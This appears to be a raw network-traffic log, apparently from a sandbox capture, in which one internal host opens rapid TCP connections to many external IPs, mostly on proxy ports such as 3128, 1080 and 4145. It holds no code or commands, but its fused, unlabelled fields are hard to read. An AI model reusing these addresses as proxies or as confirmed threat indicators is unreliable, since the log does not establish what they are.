                                                                                Feb 23, 2024 14:28:23.358437061 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.358881950 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.359025955 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.359049082 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.359061956 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.359127998 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.359647036 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.359654903 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.359689951 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.359698057 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.359709978 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.359716892 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.359776974 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.360272884 CET31284984184.17.35.129192.168.2.8
                                                                                Feb 23, 2024 14:28:23.360440016 CET976450797162.243.102.207192.168.2.8
                                                                                Feb 23, 2024 14:28:23.360498905 CET507979764192.168.2.8162.243.102.207
                                                                                Feb 23, 2024 14:28:23.361000061 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.361008883 CET507979764192.168.2.8162.243.102.207
                                                                                Feb 23, 2024 14:28:23.361072063 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.361272097 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.361306906 CET800049839159.65.217.197192.168.2.8
                                                                                Feb 23, 2024 14:28:23.362077951 CET508528443192.168.2.8101.231.64.89
                                                                                Feb 23, 2024 14:28:23.362096071 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.362119913 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.362165928 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.362173080 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.362190008 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.362224102 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.362236977 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.362248898 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.362296104 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.362324953 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.362325907 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.362345934 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.362390995 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.362394094 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.362394094 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.362432003 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.362452984 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.362514019 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.362521887 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.362541914 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.362597942 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.362603903 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.362607002 CET805022650.223.239.185192.168.2.8
                                                                                Feb 23, 2024 14:28:23.362679958 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.362690926 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.362699032 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.362711906 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.362860918 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.364042044 CET5085333302192.168.2.8107.180.101.18
                                                                                Feb 23, 2024 14:28:23.364399910 CET5085480192.168.2.8141.147.9.254
                                                                                Feb 23, 2024 14:28:23.365705967 CET156735035243.153.133.208192.168.2.8
                                                                                Feb 23, 2024 14:28:23.365950108 CET5085580192.168.2.8165.227.0.192
                                                                                Feb 23, 2024 14:28:23.366591930 CET5000618636192.168.2.851.79.87.144
                                                                                Feb 23, 2024 14:28:23.366595984 CET5027620627192.168.2.867.43.236.20
                                                                                Feb 23, 2024 14:28:23.366600990 CET500074153192.168.2.845.233.3.1
                                                                                Feb 23, 2024 14:28:23.366606951 CET500083128192.168.2.8154.202.114.154
                                                                                Feb 23, 2024 14:28:23.366698027 CET500147890192.168.2.8115.171.217.48
                                                                                Feb 23, 2024 14:28:23.366700888 CET500095678192.168.2.8116.212.144.223
                                                                                Feb 23, 2024 14:28:23.366874933 CET1332650716141.94.174.6192.168.2.8
                                                                                Feb 23, 2024 14:28:23.367314100 CET5071613326192.168.2.8141.94.174.6
                                                                                Feb 23, 2024 14:28:23.367575884 CET5071613326192.168.2.8141.94.174.6
                                                                                Feb 23, 2024 14:28:23.367577076 CET508568981192.168.2.8207.180.219.93
                                                                                Feb 23, 2024 14:28:23.367978096 CET256395026267.43.227.226192.168.2.8
                                                                                Feb 23, 2024 14:28:23.368766069 CET108205064988.255.217.49192.168.2.8
                                                                                Feb 23, 2024 14:28:23.368808985 CET5085732947192.168.2.8167.86.69.142
                                                                                Feb 23, 2024 14:28:23.370651007 CET5085835072192.168.2.8141.94.174.6
                                                                                Feb 23, 2024 14:28:23.370995045 CET156735035243.153.133.208192.168.2.8
                                                                                Feb 23, 2024 14:28:23.371453047 CET8050801172.67.182.102192.168.2.8
                                                                                Feb 23, 2024 14:28:23.371526003 CET508591080192.168.2.8103.54.148.34
                                                                                Feb 23, 2024 14:28:23.371659994 CET5080180192.168.2.8172.67.182.102
                                                                                Feb 23, 2024 14:28:23.371898890 CET5080180192.168.2.8172.67.182.102
                                                                                Feb 23, 2024 14:28:23.371984959 CET5086015673192.168.2.843.153.133.208
                                                                                Feb 23, 2024 14:28:23.372036934 CET414549932174.75.211.222192.168.2.8
                                                                                Feb 23, 2024 14:28:23.372437954 CET499324145192.168.2.8174.75.211.222
                                                                                Feb 23, 2024 14:28:23.372612953 CET8050805104.19.235.10192.168.2.8
                                                                                Feb 23, 2024 14:28:23.372620106 CET499324145192.168.2.8174.75.211.222
                                                                                Feb 23, 2024 14:28:23.372697115 CET5080580192.168.2.8104.19.235.10
                                                                                Feb 23, 2024 14:28:23.372769117 CET5080580192.168.2.8104.19.235.10
                                                                                Feb 23, 2024 14:28:23.373270035 CET5086180192.168.2.8104.22.50.220
                                                                                Feb 23, 2024 14:28:23.375181913 CET5086280192.168.2.83.12.178.169
                                                                                Feb 23, 2024 14:28:23.376681089 CET99950080181.65.169.35192.168.2.8
                                                                                Feb 23, 2024 14:28:23.376722097 CET508633128192.168.2.8168.138.21.250
                                                                                Feb 23, 2024 14:28:23.378017902 CET508641080192.168.2.8110.235.250.155
                                                                                Feb 23, 2024 14:28:23.378391027 CET508658088192.168.2.847.243.177.210
                                                                                Feb 23, 2024 14:28:23.380069971 CET508663128192.168.2.8154.202.112.72
                                                                                Feb 23, 2024 14:28:23.380635023 CET99950743191.97.16.160192.168.2.8
                                                                                Feb 23, 2024 14:28:23.380764961 CET808150559193.239.58.92192.168.2.8
                                                                                Feb 23, 2024 14:28:23.380978107 CET505598081192.168.2.8193.239.58.92
                                                                                Feb 23, 2024 14:28:23.380984068 CET808150559193.239.58.92192.168.2.8
                                                                                Feb 23, 2024 14:28:23.382173061 CET8050820104.16.195.74192.168.2.8
                                                                                Feb 23, 2024 14:28:23.382221937 CET502181081192.168.2.8125.228.77.228
                                                                                Feb 23, 2024 14:28:23.382224083 CET499873128192.168.2.818.135.211.182
                                                                                Feb 23, 2024 14:28:23.382226944 CET5001143949192.168.2.8190.82.105.123
                                                                                Feb 23, 2024 14:28:23.382246971 CET4989880192.168.2.850.169.118.211
                                                                                Feb 23, 2024 14:28:23.382249117 CET501615678192.168.2.8119.92.71.123
                                                                                Feb 23, 2024 14:28:23.382249117 CET5001350806192.168.2.8103.5.127.213
                                                                                Feb 23, 2024 14:28:23.382252932 CET5028680192.168.2.850.174.145.15
                                                                                Feb 23, 2024 14:28:23.382252932 CET500877302192.168.2.860.215.109.34
                                                                                Feb 23, 2024 14:28:23.382268906 CET5002480192.168.2.882.64.77.30
                                                                                Feb 23, 2024 14:28:23.382270098 CET500163128192.168.2.8149.102.148.170
                                                                                Feb 23, 2024 14:28:23.382270098 CET500201976192.168.2.888.255.64.91
                                                                                Feb 23, 2024 14:28:23.382272959 CET5001880192.168.2.8103.157.219.4
                                                                                Feb 23, 2024 14:28:23.382299900 CET5082080192.168.2.8104.16.195.74
                                                                                Feb 23, 2024 14:28:23.382302046 CET5002780192.168.2.8189.250.135.40
                                                                                Feb 23, 2024 14:28:23.382637978 CET5082080192.168.2.8104.16.195.74
                                                                                Feb 23, 2024 14:28:23.383157015 CET4145499101.2.221.134192.168.2.8
                                                                                Feb 23, 2024 14:28:23.384278059 CET8050623104.23.100.73192.168.2.8
                                                                                Feb 23, 2024 14:28:23.384424925 CET2671949826162.210.192.136192.168.2.8
                                                                                Feb 23, 2024 14:28:23.384632111 CET8050370113.30.149.76192.168.2.8
                                                                                Feb 23, 2024 14:28:23.384974957 CET8050370113.30.149.76192.168.2.8
                                                                                Feb 23, 2024 14:28:23.385500908 CET8050420184.169.154.119192.168.2.8
                                                                                Feb 23, 2024 14:28:23.387455940 CET805041718.133.16.21192.168.2.8
                                                                                Feb 23, 2024 14:28:23.388300896 CET8050726113.30.149.76192.168.2.8
                                                                                Feb 23, 2024 14:28:23.388386965 CET5072680192.168.2.8113.30.149.76
                                                                                Feb 23, 2024 14:28:23.388602018 CET31285059113.37.59.99192.168.2.8
                                                                                Feb 23, 2024 14:28:23.388637066 CET5042080192.168.2.8184.169.154.119
                                                                                Feb 23, 2024 14:28:23.389519930 CET5041780192.168.2.818.133.16.21
                                                                                Feb 23, 2024 14:28:23.389992952 CET8050632185.162.228.128192.168.2.8
                                                                                Feb 23, 2024 14:28:23.392503977 CET567850696212.200.161.241192.168.2.8
                                                                                Feb 23, 2024 14:28:23.393930912 CET4874449965182.160.127.53192.168.2.8
                                                                                Feb 23, 2024 14:28:23.393985987 CET646750590107.181.141.70192.168.2.8
                                                                                Feb 23, 2024 14:28:23.394805908 CET31285059113.37.59.99192.168.2.8
                                                                                Feb 23, 2024 14:28:23.395286083 CET8050836134.122.26.11192.168.2.8
                                                                                Feb 23, 2024 14:28:23.395391941 CET505913128192.168.2.813.37.59.99
                                                                                Feb 23, 2024 14:28:23.395551920 CET5083680192.168.2.8134.122.26.11
                                                                                Feb 23, 2024 14:28:23.395821095 CET5083680192.168.2.8134.122.26.11
                                                                                Feb 23, 2024 14:28:23.396434069 CET1541950604104.238.111.107192.168.2.8
                                                                                Feb 23, 2024 14:28:23.396547079 CET41455075768.1.210.189192.168.2.8
                                                                                Feb 23, 2024 14:28:23.396650076 CET3735550171167.172.109.12192.168.2.8
                                                                                Feb 23, 2024 14:28:23.396776915 CET507574145192.168.2.868.1.210.189
                                                                                Feb 23, 2024 14:28:23.396953106 CET507574145192.168.2.868.1.210.189
                                                                                Feb 23, 2024 14:28:23.397145987 CET8050642188.114.99.171192.168.2.8
                                                                                Feb 23, 2024 14:28:23.397854090 CET5026946523192.168.2.8167.99.39.82
                                                                                Feb 23, 2024 14:28:23.397870064 CET500179445192.168.2.8146.190.84.209
                                                                                Feb 23, 2024 14:28:23.397877932 CET5001930389192.168.2.891.150.189.122
                                                                                Feb 23, 2024 14:28:23.397878885 CET498223128192.168.2.8132.145.61.202
                                                                                Feb 23, 2024 14:28:23.397893906 CET500324153192.168.2.845.7.210.203
                                                                                Feb 23, 2024 14:28:23.397896051 CET500348080192.168.2.8186.103.130.93
                                                                                Feb 23, 2024 14:28:23.397898912 CET500213128192.168.2.8150.136.120.240
                                                                                Feb 23, 2024 14:28:23.397907972 CET5003653242192.168.2.8162.0.220.222
                                                                                Feb 23, 2024 14:28:23.397911072 CET501088089192.168.2.8114.106.135.102
                                                                                Feb 23, 2024 14:28:23.397914886 CET5004115303192.168.2.8184.178.172.5
                                                                                Feb 23, 2024 14:28:23.397924900 CET500408080192.168.2.884.204.40.155
                                                                                Feb 23, 2024 14:28:23.397929907 CET500234153192.168.2.846.48.126.226
                                                                                Feb 23, 2024 14:28:23.397929907 CET500228879192.168.2.891.134.140.160
                                                                                Feb 23, 2024 14:28:23.397929907 CET5003160083192.168.2.8148.66.130.187
                                                                                Feb 23, 2024 14:28:23.397958040 CET500288082192.168.2.8103.191.196.44
                                                                                Feb 23, 2024 14:28:23.397994041 CET500431080192.168.2.85.252.23.249
                                                                                Feb 23, 2024 14:28:23.398000956 CET5004280192.168.2.894.198.40.18
                                                                                Feb 23, 2024 14:28:23.398030043 CET5003321525192.168.2.8209.126.104.38
                                                                                Feb 23, 2024 14:28:23.398467064 CET414550719109.236.47.242192.168.2.8
                                                                                Feb 23, 2024 14:28:23.398751020 CET505598081192.168.2.8193.239.58.92
                                                                                Feb 23, 2024 14:28:23.399709940 CET5072680192.168.2.8113.30.149.76
                                                                                Feb 23, 2024 14:28:23.400480032 CET5086780192.168.2.850.222.245.43
                                                                                Feb 23, 2024 14:28:23.400784016 CET508688081192.168.2.8193.239.58.92
                                                                                Feb 23, 2024 14:28:23.401185036 CET805031558.234.116.197192.168.2.8
                                                                                Feb 23, 2024 14:28:23.401377916 CET805031558.234.116.197192.168.2.8
                                                                                Feb 23, 2024 14:28:23.401469946 CET805031558.234.116.197192.168.2.8
                                                                                Feb 23, 2024 14:28:23.401532888 CET5031580192.168.2.858.234.116.197
                                                                                Feb 23, 2024 14:28:23.401603937 CET414549941174.77.111.196192.168.2.8
                                                                                Feb 23, 2024 14:28:23.401695013 CET5031580192.168.2.858.234.116.197
                                                                                Feb 23, 2024 14:28:23.402153969 CET499414145192.168.2.8174.77.111.196
                                                                                Feb 23, 2024 14:28:23.402158976 CET8050648172.67.182.38192.168.2.8
                                                                                Feb 23, 2024 14:28:23.402807951 CET805022150.222.245.44192.168.2.8
                                                                                Feb 23, 2024 14:28:23.403774977 CET8050750104.18.81.76192.168.2.8
                                                                                Feb 23, 2024 14:28:23.403781891 CET8050647104.21.64.208192.168.2.8
                                                                                Feb 23, 2024 14:28:23.403827906 CET8050750104.18.81.76192.168.2.8
                                                                                Feb 23, 2024 14:28:23.404413939 CET8050750104.18.81.76192.168.2.8
                                                                                Feb 23, 2024 14:28:23.404480934 CET5075080192.168.2.8104.18.81.76
                                                                                Feb 23, 2024 14:28:23.406035900 CET312805060182.113.157.122192.168.2.8
                                                                                Feb 23, 2024 14:28:23.406205893 CET4495750784132.148.244.30192.168.2.8
                                                                                Feb 23, 2024 14:28:23.406969070 CET312805060182.113.157.122192.168.2.8
                                                                                Feb 23, 2024 14:28:23.407078981 CET5060131280192.168.2.882.113.157.122
                                                                                Feb 23, 2024 14:28:23.407079935 CET5078444957192.168.2.8132.148.244.30
                                                                                Feb 23, 2024 14:28:23.408031940 CET150845075851.75.125.208192.168.2.8
                                                                                Feb 23, 2024 14:28:23.409111023 CET5075815084192.168.2.851.75.125.208
                                                                                Feb 23, 2024 14:28:23.412044048 CET146814985367.43.227.227192.168.2.8
                                                                                Feb 23, 2024 14:28:23.412378073 CET17314985772.10.164.178192.168.2.8
                                                                                Feb 23, 2024 14:28:23.413487911 CET5003955443192.168.2.8197.232.65.40
                                                                                Feb 23, 2024 14:28:23.413494110 CET5022742580192.168.2.8175.139.179.65
                                                                                Feb 23, 2024 14:28:23.413492918 CET500305678192.168.2.837.52.13.164
                                                                                Feb 23, 2024 14:28:23.413511992 CET4992119713192.168.2.872.10.160.90
                                                                                Feb 23, 2024 14:28:23.413520098 CET4982148057192.168.2.875.119.145.169
                                                                                Feb 23, 2024 14:28:23.413523912 CET500461080192.168.2.8203.19.38.114
                                                                                Feb 23, 2024 14:28:23.413523912 CET500458080192.168.2.8102.68.128.216
                                                                                Feb 23, 2024 14:28:23.413542986 CET500474145192.168.2.8184.181.217.220
                                                                                Feb 23, 2024 14:28:23.413542986 CET500503131192.168.2.8109.24.132.215
                                                                                Feb 23, 2024 14:28:23.413544893 CET500534153192.168.2.8103.79.96.193
                                                                                Feb 23, 2024 14:28:23.413547039 CET500493128192.168.2.8198.176.54.34
                                                                                Feb 23, 2024 14:28:23.413547039 CET500591080192.168.2.8188.255.244.9
                                                                                Feb 23, 2024 14:28:23.413579941 CET805074250.204.219.225192.168.2.8
                                                                                Feb 23, 2024 14:28:23.413614035 CET5006065149192.168.2.867.213.210.118
                                                                                Feb 23, 2024 14:28:23.414660931 CET499414145192.168.2.8174.77.111.196
                                                                                Feb 23, 2024 14:28:23.414663076 CET5078444957192.168.2.8132.148.244.30
                                                                                Feb 23, 2024 14:28:23.414948940 CET8080501915.78.44.6192.168.2.8
                                                                                Feb 23, 2024 14:28:23.414949894 CET5075815084192.168.2.851.75.125.208
                                                                                Feb 23, 2024 14:28:23.415079117 CET5060131280192.168.2.882.113.157.122
                                                                                Feb 23, 2024 14:28:23.415193081 CET5075080192.168.2.8104.18.81.76
                                                                                Feb 23, 2024 14:28:23.415548086 CET5086931280192.168.2.882.113.157.122
                                                                                Feb 23, 2024 14:28:23.416255951 CET829150733164.163.21.14192.168.2.8
                                                                                Feb 23, 2024 14:28:23.416337967 CET507338291192.168.2.8164.163.21.14
                                                                                Feb 23, 2024 14:28:23.416467905 CET8050658213.143.113.82192.168.2.8
                                                                                Feb 23, 2024 14:28:23.416699886 CET507338291192.168.2.8164.163.21.14
                                                                                Feb 23, 2024 14:28:23.417309999 CET8080506098.213.128.6192.168.2.8
                                                                                Feb 23, 2024 14:28:23.417531013 CET506098080192.168.2.88.213.128.6
                                                                                Feb 23, 2024 14:28:23.417768002 CET506098080192.168.2.88.213.128.6
                                                                                Feb 23, 2024 14:28:23.419258118 CET508705678192.168.2.8113.160.203.118
                                                                                Feb 23, 2024 14:28:23.419516087 CET808150736212.127.93.185192.168.2.8
                                                                                Feb 23, 2024 14:28:23.419789076 CET507368081192.168.2.8212.127.93.185
                                                                                Feb 23, 2024 14:28:23.419789076 CET507368081192.168.2.8212.127.93.185
                                                                                Feb 23, 2024 14:28:23.420352936 CET8050764104.23.107.172192.168.2.8
                                                                                Feb 23, 2024 14:28:23.420514107 CET8050764104.23.107.172192.168.2.8
                                                                                Feb 23, 2024 14:28:23.420702934 CET5076480192.168.2.8104.23.107.172
                                                                                Feb 23, 2024 14:28:23.421107054 CET5087126077192.168.2.872.10.160.92
                                                                                Feb 23, 2024 14:28:23.421794891 CET8050764104.23.107.172192.168.2.8
                                                                                Feb 23, 2024 14:28:23.421952009 CET5076480192.168.2.8104.23.107.172
                                                                                Feb 23, 2024 14:28:23.422251940 CET8050662172.64.152.98192.168.2.8
                                                                                Feb 23, 2024 14:28:23.424555063 CET41455060772.210.208.101192.168.2.8
                                                                                Feb 23, 2024 14:28:23.424726963 CET41455060772.210.208.101192.168.2.8
                                                                                Feb 23, 2024 14:28:23.425406933 CET508724145192.168.2.872.210.208.101
                                                                                Feb 23, 2024 14:28:23.425792933 CET508735678192.168.2.8117.241.128.44
                                                                                Feb 23, 2024 14:28:23.428488970 CET508748080192.168.2.8178.212.48.80
                                                                                Feb 23, 2024 14:28:23.428575993 CET805077845.12.31.104192.168.2.8
                                                                                Feb 23, 2024 14:28:23.428584099 CET805077845.12.31.104192.168.2.8
                                                                                Feb 23, 2024 14:28:23.428777933 CET5077880192.168.2.845.12.31.104
                                                                                Feb 23, 2024 14:28:23.429085970 CET500558089192.168.2.8183.165.248.145
                                                                                Feb 23, 2024 14:28:23.429088116 CET5005680192.168.2.878.28.152.113
                                                                                Feb 23, 2024 14:28:23.429101944 CET500543128192.168.2.827.112.78.34
                                                                                Feb 23, 2024 14:28:23.429104090 CET50061999192.168.2.845.162.135.201
                                                                                Feb 23, 2024 14:28:23.429121971 CET5034080192.168.2.850.174.7.157
                                                                                Feb 23, 2024 14:28:23.429122925 CET497403128192.168.2.879.132.192.13
                                                                                Feb 23, 2024 14:28:23.429140091 CET5006448678192.168.2.8180.131.242.221
                                                                                Feb 23, 2024 14:28:23.429140091 CET500575678192.168.2.8159.224.187.170
                                                                                Feb 23, 2024 14:28:23.429140091 CET500675678192.168.2.8154.79.250.48
                                                                                Feb 23, 2024 14:28:23.429239988 CET50069999192.168.2.8179.49.162.133
                                                                                Feb 23, 2024 14:28:23.429240942 CET500688080192.168.2.8213.149.182.98
                                                                                Feb 23, 2024 14:28:23.429474115 CET805077845.12.31.104192.168.2.8
                                                                                Feb 23, 2024 14:28:23.429492950 CET10805018531.172.189.205192.168.2.8
                                                                                Feb 23, 2024 14:28:23.429614067 CET5077880192.168.2.845.12.31.104
                                                                                Feb 23, 2024 14:28:23.430131912 CET101214986572.10.164.178192.168.2.8
                                                                                Feb 23, 2024 14:28:23.431047916 CET31295021920.219.177.73192.168.2.8
                                                                                Feb 23, 2024 14:28:23.431082010 CET31295021920.219.177.73192.168.2.8
                                                                                Feb 23, 2024 14:28:23.431133986 CET31295021920.219.177.73192.168.2.8
                                                                                Feb 23, 2024 14:28:23.431142092 CET31295021920.219.177.73192.168.2.8
                                                                                Feb 23, 2024 14:28:23.431164980 CET502193129192.168.2.820.219.177.73
                                                                                Feb 23, 2024 14:28:23.431193113 CET502193129192.168.2.820.219.177.73
                                                                                Feb 23, 2024 14:28:23.432044983 CET808050392185.38.111.1192.168.2.8
                                                                                Feb 23, 2024 14:28:23.432050943 CET808050392185.38.111.1192.168.2.8
                                                                                Feb 23, 2024 14:28:23.432166100 CET503928080192.168.2.8185.38.111.1
                                                                                Feb 23, 2024 14:28:23.433092117 CET31285019834.83.143.6192.168.2.8
                                                                                Feb 23, 2024 14:28:23.433111906 CET503928080192.168.2.8185.38.111.1
                                                                                Feb 23, 2024 14:28:23.435127974 CET501983128192.168.2.834.83.143.6
                                                                                Feb 23, 2024 14:28:23.435503006 CET44795084667.43.227.227192.168.2.8
                                                                                Feb 23, 2024 14:28:23.435575008 CET3080498025.9.98.142192.168.2.8
                                                                                Feb 23, 2024 14:28:23.435873985 CET502193129192.168.2.820.219.177.73
                                                                                Feb 23, 2024 14:28:23.435874939 CET508758080192.168.2.8185.38.111.1
                                                                                Feb 23, 2024 14:28:23.436572075 CET41535015682.194.133.209192.168.2.8
                                                                                Feb 23, 2024 14:28:23.437262058 CET50876999192.168.2.8177.93.44.53
                                                                                Feb 23, 2024 14:28:23.440354109 CET5087716379192.168.2.851.15.230.100
                                                                                Feb 23, 2024 14:28:23.440363884 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.440371037 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.440398932 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.440464973 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.440471888 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.440485001 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.440500021 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.440538883 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.440570116 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.440602064 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.440608978 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.440623999 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.440656900 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.440685034 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.440687895 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.440706968 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.440763950 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.440809965 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.440818071 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.440851927 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.440860033 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.440891027 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.440926075 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.440937042 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.440967083 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.440993071 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441030025 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441031933 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.441050053 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441063881 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.441095114 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441106081 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.441121101 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441139936 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441174984 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441189051 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.441231966 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.441289902 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441329956 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441343069 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441363096 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441380978 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.441401005 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441447973 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.441463947 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441471100 CET587545084992.204.135.4192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441485882 CET326505038291.108.130.111192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441497087 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441543102 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.441557884 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441576958 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441613913 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441639900 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441641092 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.441669941 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.441710949 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441719055 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441766024 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441766977 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.441798925 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441836119 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.441843033 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441852093 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441881895 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441901922 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441920996 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441930056 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.441962004 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441982985 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.441992998 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.441999912 CET8050689104.16.108.204192.168.2.8
                                                                                Feb 23, 2024 14:28:23.442056894 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.442071915 CET500484228192.168.2.85.161.219.13
